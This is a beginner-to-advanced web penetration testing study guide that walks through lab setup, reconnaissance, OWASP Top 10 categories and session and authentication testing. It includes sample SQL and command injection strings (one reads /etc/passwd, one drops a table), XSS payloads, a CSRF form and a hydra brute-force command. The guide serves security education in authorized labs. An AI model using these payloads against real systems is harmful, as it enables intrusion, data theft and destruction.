Pentesting from Beginner to Advanced

Purpose

Provide a structured learning path for web application penetration testing, progressing from foundational concepts through advanced exploitation techniques. Guide learners through each phase of the web security assessment process.

Inputs/Prerequisites

• Basic computer and networking knowledge
• Kali Linux or security-focused OS
• BurpSuite installed and configured
• Lab environment (bWAPP, DVWA, or similar)
• Web browser with developer tools

Outputs/Deliverables

• Foundational web security knowledge
• Practical exploitation skills
• Understanding of OWASP Top 10
• Ability to conduct web application assessments
• Vulnerability identification and reporting skills

Core Workflow

Phase 1: History and Fundamentals

Understanding the Internet:

• Learn how the internet was developed
• Understand client-server architecture
• Grasp basic web communication models

Key Concepts:

• HTTP protocol fundamentals
• Request/response structure
• Client vs server-side processing

Phase 2: Web and Server Technology

HTTP Protocol Basics:

HTTP Request Structure:
GET /page HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: text/html
Cookie: session=abc123

HTTP Response Structure:
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=xyz789

<html>...</html>

Essential Concepts:

Encoding Types:

# URL Encoding
Space -> %20
< -> %3C
> -> %3E
" -> %22

# HTML Encoding
< -> &lt;
> -> &gt;
& -> &amp;

# Base64 Encoding
echo "text" | base64
echo "dGV4dAo=" | base64 -d

Phase 3: Lab Setup with BurpSuite

Install BurpSuite:

# Download from PortSwigger
# Configure browser proxy: 127.0.0.1:8080
# Import Burp CA certificate

Configure Browser:

1. Set proxy to 127.0.0.1:8080
2. Import BurpSuite CA certificate
3. Disable certificate validation for testing

BurpSuite Modules:

Set Up Practice Lab:

# Install Docker
apt install docker.io

# Run bWAPP
docker run -d -p 80:80 raesene/bwapp

# Run DVWA
docker run -d -p 80:80 vulnerables/web-dvwa

# Access at http://localhost

Phase 4: Application Mapping

Discovery Techniques:

# Robots.txt analysis
curl http://target/robots.txt

# Directory brute forcing
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
dirbuster -u http://target -l /usr/share/wordlists/dirb/common.txt

# Spidering with Burp
# Use Target > Site Map > Spider

Entry Point Identification:

• Forms and input fields
• URL parameters
• Hidden fields
• Cookies
• HTTP headers

Technology Fingerprinting:

# Whatweb
whatweb http://target

# Wappalyzer (browser extension)

# Nmap fingerprinting
nmap -sV --script http-enum target

# Banner grabbing
curl -I http://target

Phase 5: OWASP Top 10 Vulnerabilities

1. Injection (A03:2021)

# SQL Injection
' OR 1=1--
" OR ""="
'; DROP TABLE users;--

# Command Injection
; ls -la
| cat /etc/passwd
&& whoami

# LDAP Injection
*)(uid=*))(|(uid=*

2. Broken Authentication (A07:2021)

- Weak passwords
- Session fixation
- Credential stuffing
- Missing MFA
- Insecure password recovery

3. Cross-Site Scripting (A03:2021)

<!-- Reflected XSS -->
<script>alert('XSS')</script>

<!-- Stored XSS -->
<img src=x onerror="alert('XSS')">

<!-- DOM-based XSS -->
<svg onload="alert('XSS')">

<!-- Filter bypass -->
<ScRiPt>alert('XSS')</ScRiPt>
<img src="x" onerror="alert('XSS')">

4. Insecure Direct Object Reference (A01:2021)

# IDOR Examples
/api/user/123    -> /api/user/124
/download?id=1   -> /download?id=2
/invoice/10001   -> /invoice/10002

5. Security Misconfiguration (A05:2021)

- Default credentials
- Unnecessary features enabled
- Error messages revealing info
- Missing security headers
- Outdated software

6. Sensitive Data Exposure (A02:2021)

- Unencrypted transmission
- Weak encryption
- Exposed API keys
- Hardcoded credentials
- Information in error messages

7. Missing Access Controls (A01:2021)

- Horizontal privilege escalation
- Vertical privilege escalation
- Forced browsing to admin pages
- API without authentication

8. Cross-Site Request Forgery (A01:2021)

<!-- CSRF Attack Form -->
<form action="http://target/transfer" method="POST">
  <input type="hidden" name="amount" value="10000">
  <input type="hidden" name="to" value="attacker">
  <input type="submit" value="Click Me!">
</form>

9. Components with Known Vulnerabilities (A06:2021)

# Check for CVEs
searchsploit apache 2.4
searchsploit wordpress 5.0

# Retire.js for JavaScript
retire --path /path/to/js

10. Insufficient Logging (A09:2021)

- Failed login attempts not logged
- No audit trail
- Logs not monitored
- Logs stored insecurely

Phase 6: Session Management Testing

Session Analysis:

# Burp Sequencer
# Analyze token randomness and predictability

# Check for:
- Session fixation
- Session hijacking
- Weak session tokens
- Missing timeout
- Insecure transmission

Cookie Security Flags:

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict

Phase 7: Bypassing Client-Side Controls

Hidden Field Manipulation:

<!-- Original -->
<input type="hidden" name="price" value="100">

<!-- Modified in Burp -->
<input type="hidden" name="price" value="1">

JavaScript Validation Bypass:

• Disable JavaScript in browser
• Intercept and modify with Burp
• Replay requests with modified values

Phase 8: Authentication Attacks

Common Techniques:

# Brute force
hydra -l admin -P passwords.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Username enumeration
# Different responses for valid/invalid users

# Password reset flaws
# Predictable tokens, no rate limiting

Phase 9: Access Control Testing

IDOR Testing:

# Increment IDs
/user/1 -> /user/2

# Change parameters
?role=user -> ?role=admin

# Use Burp Intruder for automation

Phase 10: Input Validation Testing

Injection Points:

# All user input
# URL parameters
# Form fields
# Headers (User-Agent, Referer)
# Cookies
# File uploads

Fuzzing with Burp:

1. Send request to Intruder
2. Mark injection points
3. Select payload list
4. Analyze responses

Phase 11: Error Code Analysis

# Force errors for information
- Invalid input types
- Long strings
- Special characters
- SQL syntax errors

# Look for:
- Stack traces
- Database errors
- Path disclosure
- Version information

Phase 12: Cryptography Testing

# Check for:
- Weak algorithms (MD5, SHA1, DES)
- ECB mode usage
- Hardcoded keys
- Missing encryption

# SSL/TLS testing
sslscan target:443
testssl.sh target

Phase 13: Business Logic Vulnerabilities

Common Issues:

• Price manipulation
• Skipping workflow steps
• Race conditions
• Abuse of functionality

Testing Approach:

1. Understand normal workflow
2. Attempt to skip steps
3. Modify values mid-process
4. Test race conditions

Quick Reference

Essential Tools

Testing Checklist

□ Map application and entry points
□ Test authentication mechanisms
□ Check authorization controls
□ Test input validation
□ Analyze session management
□ Check for injection flaws
□ Test business logic
□ Review error handling
□ Assess cryptographic implementation

Constraints

• Only test authorized systems
• Lab environments are essential for learning
• Real-world applications may differ from labs
• Tools require understanding, not just execution

Examples

Example 1: Quick XSS Test

<script>alert(document.domain)</script>

Example 2: SQLi Detection

' OR '1'='1

Troubleshooting